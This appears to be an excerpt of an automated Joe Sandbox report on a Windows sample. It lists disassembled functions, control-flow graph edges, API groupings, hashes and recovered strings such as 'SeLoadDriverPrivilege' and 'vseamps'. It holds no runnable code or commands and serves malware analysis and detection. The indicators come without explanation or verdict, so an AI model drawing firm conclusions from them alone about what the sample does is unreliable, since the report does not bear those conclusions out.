                                  Function 00007FFBC3201C00 Relevance: 12.2, APIs: 8, Instructions: 227COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 25 7ffbc3201c00-7ffbc3201c06 26 7ffbc3201c08-7ffbc3201c0b 25->26 27 7ffbc3201c41-7ffbc3201c4b 25->27 29 7ffbc3201c35-7ffbc3201c74 call 7ffbc3202470 26->29 30 7ffbc3201c0d-7ffbc3201c10 26->30 28 7ffbc3201d68-7ffbc3201d7d 27->28 34 7ffbc3201d7f 28->34 35 7ffbc3201d8c-7ffbc3201da6 call 7ffbc3202304 28->35 47 7ffbc3201c7a-7ffbc3201c8f call 7ffbc3202304 29->47 48 7ffbc3201d42 29->48 32 7ffbc3201c28 __scrt_dllmain_crt_thread_attach 30->32 33 7ffbc3201c12-7ffbc3201c15 30->33 36 7ffbc3201c2d-7ffbc3201c34 32->36 38 7ffbc3201c17-7ffbc3201c20 33->38 39 7ffbc3201c21-7ffbc3201c26 call 7ffbc32023b4 33->39 40 7ffbc3201d81-7ffbc3201d8b 34->40 45 7ffbc3201da8-7ffbc3201dd9 call 7ffbc320242c call 7ffbc32022d4 call 7ffbc32027b4 call 7ffbc32025d0 call 7ffbc32025f4 call 7ffbc320245c 35->45 46 7ffbc3201ddb-7ffbc3201e0c call 7ffbc3202630 35->46 39->36 45->40 57 7ffbc3201e0e-7ffbc3201e14 46->57 58 7ffbc3201e1d-7ffbc3201e23 46->58 60 7ffbc3201d5a-7ffbc3201d67 call 7ffbc3202630 47->60 61 7ffbc3201c95-7ffbc3201ca6 call 7ffbc3202374 47->61 51 7ffbc3201d44-7ffbc3201d59 48->51 57->58 62 7ffbc3201e16-7ffbc3201e18 57->62 63 7ffbc3201e65-7ffbc3201e6d call 7ffbc3201720 58->63 64 7ffbc3201e25-7ffbc3201e2f 58->64 60->28 77 7ffbc3201ca8-7ffbc3201ccc call 7ffbc3202778 call 7ffbc32022c4 call 7ffbc32022e8 call 7ffbc3207b10 61->77 78 7ffbc3201cf7-7ffbc3201d01 call 7ffbc32025d0 61->78 68 7ffbc3201f02-7ffbc3201f0f 62->68 79 7ffbc3201e72-7ffbc3201e7b 63->79 69 7ffbc3201e36-7ffbc3201e3c 64->69 70 7ffbc3201e31-7ffbc3201e34 64->70 75 7ffbc3201e3e-7ffbc3201e44 69->75 70->75 84 7ffbc3201e4a-7ffbc3201e5f call 7ffbc3201c00 75->84 85 7ffbc3201ef8-7ffbc3201f00 75->85 77->78 127 7ffbc3201cce-7ffbc3201cd5 __scrt_dllmain_after_initialize_c 77->127 78->48 101 7ffbc3201d03-7ffbc3201d0f call 7ffbc3202620 78->101 80 7ffbc3201eb3-7ffbc3201eb5 79->80 81 7ffbc3201e7d-7ffbc3201e7f 79->81 90 7ffbc3201eb7-7ffbc3201eba 80->90 91 7ffbc3201ebc-7ffbc3201ed1 call 7ffbc3201c00 80->91 81->80 88 7ffbc3201e81-7ffbc3201ea3 call 7ffbc3201720 call 7ffbc3201d68 81->88 84->63 84->85 85->68 88->80 121 7ffbc3201ea5-7ffbc3201eaa 88->121 90->85 90->91 91->85 110 7ffbc3201ed3-7ffbc3201edd 91->110 112 7ffbc3201d35-7ffbc3201d40 101->112 113 7ffbc3201d11-7ffbc3201d1b call 7ffbc3202538 101->113 117 7ffbc3201ee4-7ffbc3201ef2 110->117 118 7ffbc3201edf-7ffbc3201ee2 110->118 112->51 113->112 126 7ffbc3201d1d-7ffbc3201d2b 113->126 122 7ffbc3201ef4 117->122 118->122 121->80 122->85 126->112 127->78 128 7ffbc3201cd7-7ffbc3201cf4 call 7ffbc3207acc 127->128 128->78
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2421075266.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                  • Associated: 00000006.00000002.2421060682.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000006.00000002.2421093804.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000006.00000002.2421110819.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000006.00000002.2421125645.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7ffbc3200000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                  • String ID:
                                  • API String ID: 190073905-0
                                  • Opcode ID: 2846997451869cfc22dce892cf33863956c031717884ec40ded3d85d199baf95
                                  • Instruction ID: 200ba1eaccdb56bb8a39e9f9c3ebab91d682492d5e843a2ac4e892f0bbe45b50
                                  • Opcode Fuzzy Hash: 2846997451869cfc22dce892cf33863956c031717884ec40ded3d85d199baf95
                                  • Instruction Fuzzy Hash: C58168B5E0834346FE54BF75D541A7B63A0AF45780F9C4036EA0E6F692DE2CF9498780
                                  Function 00007FFBC3201720 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2421075266.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                  • Associated: 00000006.00000002.2421060682.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000006.00000002.2421093804.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000006.00000002.2421110819.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000006.00000002.2421125645.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7ffbc3200000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Concurrency::cancel_current_taskFree$ConsoleFileFindFirstLibrary
                                  • String ID: WordpadFilter.db
                                  • API String ID: 868324331-3647581008
                                  • Opcode ID: d3782359f8138357475ac289ad5b0888311af99f11814fa5341d046d98142f4f
                                  • Instruction ID: efc89471d09b85c4e495e240cf211d7dcb704c5374d01f5d9737b1d73c5383d6
                                  • Opcode Fuzzy Hash: d3782359f8138357475ac289ad5b0888311af99f11814fa5341d046d98142f4f
                                  • Instruction Fuzzy Hash: 65318072B15B4189EB00EFB1D8406AE73B5EB98788F584635EE8D27B44EF38D555C380
                                  Function 00007FFBC32011B0 Relevance: 3.2, APIs: 2, Instructions: 235COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 196 7ffbc32011b0-7ffbc3201207 197 7ffbc3201209-7ffbc3201222 call 7ffbc3211490 196->197 198 7ffbc320124b-7ffbc320124e 196->198 210 7ffbc3201224-7ffbc3201227 197->210 211 7ffbc320123e 197->211 199 7ffbc32014b8-7ffbc32014bf 198->199 200 7ffbc3201254-7ffbc3201280 198->200 204 7ffbc32014c3-7ffbc32014ea call 7ffbc3201b70 199->204 202 7ffbc32012f6-7ffbc3201335 call 7ffbc3201b90 call 7ffbc3210a50 200->202 203 7ffbc3201282-7ffbc320128f 200->203 231 7ffbc3201340-7ffbc32013cb 202->231 207 7ffbc3201295-7ffbc320129c 203->207 208 7ffbc32014f1-7ffbc32014f6 call 7ffbc3201a40 203->208 214 7ffbc32012c7-7ffbc32012cf call 7ffbc3201b90 207->214 215 7ffbc320129e-7ffbc32012a5 207->215 221 7ffbc32014f7-7ffbc32014ff call 7ffbc3201110 208->221 212 7ffbc3201241-7ffbc3201246 210->212 217 7ffbc3201229-7ffbc320123c call 7ffbc3211490 210->217 211->212 212->198 233 7ffbc32012d2-7ffbc32012f1 call 7ffbc3210e10 214->233 215->221 222 7ffbc32012ab-7ffbc32012b3 call 7ffbc3201b90 215->222 217->210 217->211 235 7ffbc32012b9-7ffbc32012c5 222->235 236 7ffbc32014eb-7ffbc32014f0 call 7ffbc32079cc 222->236 231->231 234 7ffbc32013d1-7ffbc32013da 231->234 233->202 239 7ffbc32013e0-7ffbc3201402 234->239 235->233 236->208 241 7ffbc3201404-7ffbc320140e 239->241 242 7ffbc3201411-7ffbc320142c 239->242 241->242 242->239 244 7ffbc320142e-7ffbc3201436 242->244 245 7ffbc3201498-7ffbc32014a6 244->245 246 7ffbc3201438-7ffbc320143b 244->246 247 7ffbc32014a8-7ffbc32014b5 call 7ffbc3201bcc 245->247 248 7ffbc32014b6 245->248 249 7ffbc3201440-7ffbc3201449 246->249 247->248 248->204 251 7ffbc3201455-7ffbc3201465 249->251 252 7ffbc320144b-7ffbc3201453 249->252 253 7ffbc3201467-7ffbc320146e 251->253 254 7ffbc3201470-7ffbc3201496 251->254 252->251 253->254 254->245 254->249
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2421075266.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                  • Associated: 00000006.00000002.2421060682.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000006.00000002.2421093804.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000006.00000002.2421110819.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000006.00000002.2421125645.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7ffbc3200000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                  • String ID:
                                  • API String ID: 73155330-0
                                  • Opcode ID: c49bc023de0e2a92928f53e7c16b56888227e9b94bcb6080ad38a6f5ea522257
                                  • Instruction ID: b5c6679d8abf1cf11a429dd6e243c46acffadc3ab6381ad13ab9c944b6361c89
                                  • Opcode Fuzzy Hash: c49bc023de0e2a92928f53e7c16b56888227e9b94bcb6080ad38a6f5ea522257
                                  • Instruction Fuzzy Hash: 45816A76A1869246EA11AF35D8005BAA794FF56BC4F588335EF593B792DF3CF0928300

                                  Non-executed Functions

                                  Function 0000000140001A30 Relevance: 37.9, APIs: 30, Instructions: 422memorystringCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CriticalSection$EnterLeave$Heap$AllocProcesslstrlen
                                  • String ID:
                                  • API String ID: 3526400053-0
                                  • Opcode ID: 2d7440e75e10ea9e081ba84afc5c3468ce3eac85d6796ce4805a157c9b29c232
                                  • Instruction ID: dcb8fc7c666fd7128fde866f0540a8def7dae1288ec2bbf322971b46f3f62141
                                  • Opcode Fuzzy Hash: 2d7440e75e10ea9e081ba84afc5c3468ce3eac85d6796ce4805a157c9b29c232
                                  • Instruction Fuzzy Hash: E3220F76211B4086E722DF26F840B9933A1F78CBE5F541226EB5A8B7B4DF3AC585C740
                                  Function 0000000140003F80 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 160timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CriticalSectionServer$CreateErrorLastProcessTimerTokenWaitable$AdjustCloseContextCurrentDontEnterEventHandleInitializeLeaveListenLookupOpenPrivilegePrivilegesProtseqRegisterSerializeValueVersion
                                  • String ID: SeLoadDriverPrivilege$ampStartSingletone: logging started, settins=%s$null
                                  • API String ID: 3408796845-4213300970
                                  • Opcode ID: 126decfa78297cd7188aa212e183f7007b74f13d5c024852e8adcc4be0567069
                                  • Instruction ID: 59d58333609de1a5812b0fd1fbb73637b4596d8d749a2627428b03e5fdfefd81
                                  • Opcode Fuzzy Hash: 126decfa78297cd7188aa212e183f7007b74f13d5c024852e8adcc4be0567069
                                  • Instruction Fuzzy Hash: B19104B1224A4182EB12CF22F854BC633A5F78C7D4F445229FB9A4B6B4DF7AC159CB44
                                  Function 00000001400042B0 Relevance: 31.6, APIs: 17, Strings: 1, Instructions: 59synchronizationtimethreadCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CriticalSection$CloseHandle$DeleteEnterLeaveServer$CancelEventListeningMgmtObjectSingleStopTerminateThreadTimerUnregisterWaitWaitable
                                  • String ID: ampStopSingletone: logging ended
                                  • API String ID: 2048888615-3533855269
                                  • Opcode ID: 304760f1fd88bc3c97c02eb8ad6caf2cea0e78157ea711a11ae6bb1ec958ebce
                                  • Instruction ID: 72436faa0f880f3f140bbf81e9e476d17cd4b789f208762ad84a5967a0be411a
                                  • Opcode Fuzzy Hash: 304760f1fd88bc3c97c02eb8ad6caf2cea0e78157ea711a11ae6bb1ec958ebce
                                  • Instruction Fuzzy Hash: 85315178221A0192EB17DF27EC94BD82361E79CBE1F455111FB0A4B2B1CF7AC5898744
                                  Function 000000014000C3F0 Relevance: 29.0, APIs: 19, Instructions: 515COMMONLIBRARYCODE
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3eee3a1980859deabbe81d62853d66f73e7f8938a0b91b292409d40ad6238f27
                                  • Instruction ID: 939e1951021ac32239a98278383650b1560c4a87fea8e277fdca239b4ddbef52
                                  • Opcode Fuzzy Hash: 3eee3a1980859deabbe81d62853d66f73e7f8938a0b91b292409d40ad6238f27
                                  • Instruction Fuzzy Hash: 3022CEB2625A8086EB22CF2BF445BEA77A0F78DBC4F444116FB4A476B5DB39C445CB00
                                  Function 0000000140001520 Relevance: 22.8, APIs: 10, Strings: 3, Instructions: 95COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: ErrorLastManagerOpen$FileModuleName
                                  • String ID: /remove$/service$vseamps
                                  • API String ID: 67513587-3839141145
                                  • Opcode ID: 39fa17c263662ab8de8707f1fae5283c28ed51da3e4186f1b0bc27974e33e859
                                  • Instruction ID: ba5f49d8dd96f1c36e401cc1f7cdff7269c229e2e129f463089a9495e32f08e5
                                  • Opcode Fuzzy Hash: 39fa17c263662ab8de8707f1fae5283c28ed51da3e4186f1b0bc27974e33e859
                                  • Instruction Fuzzy Hash: F031E9B2708B4086EB42DF67B84439AA3A1F78CBD4F480025FF5947B7AEE79C5558704
                                  Function 000000014000F000 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 152libraryloaderCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryA.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F042
                                  • GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F05E
                                  • GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F086
                                  • GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F0A5
                                  • GetProcAddress.KERNEL32 ref: 000000014000F0F3
                                  • GetProcAddress.KERNEL32 ref: 000000014000F117
                                    • Part of subcall function 00000001400073E0: LdrLoadDll.NTDLL ref: 00000001400073E2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: AddressProc$Load$Library
                                  • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
                                  • API String ID: 3981747205-232180764
                                  • Opcode ID: a4a8166f7fb3539f2a033069c8db60d0a751c3badd5dc7e485aee673dfe3cd32
                                  • Instruction ID: 2f5902004a3f6de811dc5f380475ae1a3efdd32c0186a6d00da0f9ae6c345c7d
                                  • Opcode Fuzzy Hash: a4a8166f7fb3539f2a033069c8db60d0a751c3badd5dc7e485aee673dfe3cd32
                                  • Instruction Fuzzy Hash: FE515CB561674181FE66EB63B850BFA2290BB8D7D0F484025BF4E4BBB1EF3DC445A210
                                  Function 00000001400022C0 Relevance: 15.1, APIs: 10, Instructions: 96threadCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CreateEvent$Thread$ClientCriticalCurrentImpersonateInitializeOpenRevertSectionSelfToken
                                  • String ID:
                                  • API String ID: 4284112124-0
                                  • Opcode ID: edd1c8558eeb60cdd671b70c13388f4905a0e10de3bd345b1359afa696ffe28d
                                  • Instruction ID: d1cc2c0b88e239984ef66edc10b99dba483783d79de04edfe0f0364e5ac1fb7c
                                  • Opcode Fuzzy Hash: edd1c8558eeb60cdd671b70c13388f4905a0e10de3bd345b1359afa696ffe28d
                                  • Instruction Fuzzy Hash: 65415D72604B408AE351CF66F88479EB7A0F78CB94F508129EB8A47B74CF79D595CB40
                                  Function 0000000140001430 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 52serviceCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Service$CloseHandle$CreateErrorFileLastManagerModuleNameOpen
                                  • String ID: vseamps
                                  • API String ID: 3693165506-3944098904
                                  • Opcode ID: 37866f258d51cd6cd84815c45d3eaefe281d6d9a8e40d6c1e65e6d09f5d7cdba
                                  • Instruction ID: 61898eac7960aa5413d410c65d13376abce5a62f28ec8a6c68938921ced9de71
                                  • Opcode Fuzzy Hash: 37866f258d51cd6cd84815c45d3eaefe281d6d9a8e40d6c1e65e6d09f5d7cdba
                                  • Instruction Fuzzy Hash: F321FCB1204B8086EB56CF66F88439A73A4F78C784F544129E7894B774DF7DC149CB00
                                  Function 0000000140009300 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 154COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • GetModuleFileNameA.KERNEL32(?,?,?,00000000,00000001,000000014000961C,?,?,?,?,?,?,0000000140009131,?,?,00000001), ref: 00000001400093CF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: FileModuleName
                                  • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                  • API String ID: 514040917-4022980321
                                  • Opcode ID: 1d01bebd6d090e025827d9f03818fc87fa6a91df27b235dcc59e95ab31d19661
                                  • Instruction ID: eb4045a5a240d2828a775daba1198261b01968dd91f8e387fbd6cb4ec0284cf4
                                  • Opcode Fuzzy Hash: 1d01bebd6d090e025827d9f03818fc87fa6a91df27b235dcc59e95ab31d19661
                                  • Instruction Fuzzy Hash: F851EFB131464042FB26DB2BB851BEA2391A78D7E0F484225BF2947AF2DF39C642C304
                                  Function 000000014000BB70 Relevance: 12.3, APIs: 8, Instructions: 256COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: String$ByteCharMultiWide$AllocErrorHeapLast
                                  • String ID:
                                  • API String ID: 2057259594-0
                                  • Opcode ID: d3ef643e943a21760fc28678b116a7f08da1d9f04a09311d9013e3bfd6c4d4e3
                                  • Instruction ID: f9b9a5bb90e2e08b647a9eb75fc4ff4e18af91537db3c322e1916602633d995e
                                  • Opcode Fuzzy Hash: d3ef643e943a21760fc28678b116a7f08da1d9f04a09311d9013e3bfd6c4d4e3
                                  • Instruction Fuzzy Hash: B6A16AB22046808AEB66DF27E8407EA77E5F74CBE8F144625FB6947BE4DB78C5408700
                                  Function 0000000140005A70 Relevance: 12.2, APIs: 8, Instructions: 163memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Heap$Process$Free$AllocInfoStartupVersion
                                  • String ID:
                                  • API String ID: 3103264659-0
                                  • Opcode ID: b926c3abaa2c479ec326760b90e5a1fd11221ebaffc6337adf83b77cd4a46ae1
                                  • Instruction ID: 8fdcf1cc106887877eb8bf0912cd84dfc65bead55acac366e092854278e1a3ce
                                  • Opcode Fuzzy Hash: b926c3abaa2c479ec326760b90e5a1fd11221ebaffc6337adf83b77cd4a46ae1
                                  • Instruction Fuzzy Hash: 0F7167B1604A418AF767EBA3B8557EA2291BB8D7C5F084039FB45472F2EF39C440C741
                                  Function 00007FFBC3202630 Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2421075266.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                  • Associated: 00000006.00000002.2421060682.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000006.00000002.2421093804.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000006.00000002.2421110819.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000006.00000002.2421125645.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7ffbc3200000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                  • String ID:
                                  • API String ID: 3140674995-0
                                  • Opcode ID: 710f6283529bc39a5878960356047a6e461f095b9b13c17159f2665477d47395
                                  • Instruction ID: c09f5866895955077d0dde4ac92d8145ab44faf40904bb5ab03130ef3490085c
                                  • Opcode Fuzzy Hash: 710f6283529bc39a5878960356047a6e461f095b9b13c17159f2665477d47395
                                  • Instruction Fuzzy Hash: 81313EB2609B8186EB609F70E840BEE7375FB94744F88413ADA4E5BB94DF38D648C710
                                  Function 0000000140007C91 Relevance: 9.1, APIs: 6, Instructions: 137COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
